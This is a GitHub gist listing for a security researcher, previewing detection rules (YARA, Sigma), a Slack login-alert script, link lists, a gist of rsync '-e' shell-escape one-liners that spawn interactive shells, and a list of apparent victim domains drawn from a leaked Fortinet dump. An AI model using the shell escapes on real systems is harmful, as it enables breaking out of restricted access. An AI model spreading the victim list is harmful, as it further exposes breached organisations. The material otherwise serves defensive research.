Skip to content

Instantly share code, notes, and snippets.

View Neo23x0's full-sized avatar

Florian Roth Neo23x0

5.7k followers · 24 following
View GitHub Profile
@Neo23x0
Neo23x0 / mal_win_go_backorder_loader.yar
Last active February 12, 2025 21:43
rule MAL_BACKORDER_LOADER_WIN_Go_Jan23 {
meta:
description = "Detects the BACKORDER loader compiled in GO which download and executes a second stage payload from a remote server."
author = "Arda Buyukkaya (modified by Florian Roth)"
date = "2025-01-23"
reference = "EclecticIQ"
score = 80
tags = "loader, golang, BACKORDER, malware, windows"
hash = "70c91ffdc866920a634b31bf4a070fb3c3f947fc9de22b783d6f47a097fec2d8"
strings:
@Neo23x0
Neo23x0 / fortinet-domains.txt
Last active February 17, 2025 09:45
FortiGate Dump Domains - Grouped by TLD and Sorted Alphabetically
This is a list of the domains used in the contact email addresses found in the Fortinet dump file as published by Belsen Group and analysed by Kevin Beaumont on Mastodon : https://cyberplace.social/@GossiTheDog/113834848200229959
Some of these domains may just be the domains of free email services or services providers working for the actual victims.
AE
----------------------------------------------------------------------
acsllc.ae
aisdubai.ae
alhamra.ae
alrayan.ae
alshirawi.ae
@Neo23x0
Neo23x0 / gist:a20436375a1e26524931dd8ea1a3af10
Created January 18, 2025 11:12
RSync -e Examples
# Basic Shell Escapes
rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e 'bash -c "bash 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/bash -i' 127.0.0.1:/dev/null
rsync -e 'dash -c "dash 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/dash -i' 127.0.0.1:/dev/null
rsync -e 'zsh -c "zsh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/zsh -i' 127.0.0.1:/dev/null
rsync -e 'ksh -c "ksh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/ksh -i' 127.0.0.1:/dev/null
@Neo23x0
Neo23x0 / sigma_correlation_failed_login_success.yml
Last active December 4, 2023 10:00
Sigma - Correlation Rule
title: Correlation - Multiple Failed Logins Followed by Successful Login
id: b180ead8-d58f-40b2-ae54-c8940995b9b6
status: experimental
description: Detects multiple failed logins by a single user followed by a successful login of that user
references:
- https://reference.com
author: Florian Roth (Nextron Systems)
date: 2023/06/16
correlation:
type: temporal
@Neo23x0
Neo23x0 / sigma-evtx-scan.md
Last active December 11, 2024 06:36
Guide to Use Sigma EVTX Checker

Guide to Use Nextron's Sigma EVTX Checker

It's a fast go-based scanner for Linux, Windows, and macOS that applies Sigma rules and outputs the matches as JSON.

Clone the Sigma Repository and cd into it

git clone https://github.com/SigmaHQ/sigma.git
cd sigma
@Neo23x0
Neo23x0 / link-tree.md
Created December 18, 2022 18:48
My Link List
@Neo23x0
Neo23x0 / nighthawk-blog-posts.md
Last active August 1, 2023 21:53
Collection of Deleted Articles on MDSec's Nighthawk
@Neo23x0
Neo23x0 / send-to-slack.sh
Created September 11, 2022 21:22
Slack Hook - System Logon
#!/bin/bash -x
hostname=$(hostname)
source=$(echo "$SSH_CONNECTION" | cut -d' ' -f 1)
geo=$(geoiplookup "$source")
curl -X POST --silent --data "payload={\"text\": \":bust_in_silhouette: SYSTEM: $hostname USER: $USER SOURCE: $source GEO: $geo\"}" https://hooks.slack.com/services/XXXXXXXX_YOURHOOK_XXXXX > /dev/null
@Neo23x0
Neo23x0 / cyber-security-blogs.txt
Created September 10, 2022 13:49
Cyber Security Blogs
https://thedfirreport.com/
https://www.zerodayinitiative.com/blog/
https://codewhitesec.blogspot.com/
https://www.digitalshadows.com/blog-and-research/
https://blog.talosintelligence.com/
https://www.riskiq.com/blog/
https://www.sekoia.io/en/blog-sekoia-io/
https://www.nextron-systems.com/blog/
https://www.microsoft.com/security/blog/
https://blog.truesec.com/
@Neo23x0
Neo23x0 / nvidia_cert_leak_vt_dorks.md
Created March 5, 2022 12:49
Samples Signed with NVIDIA Certs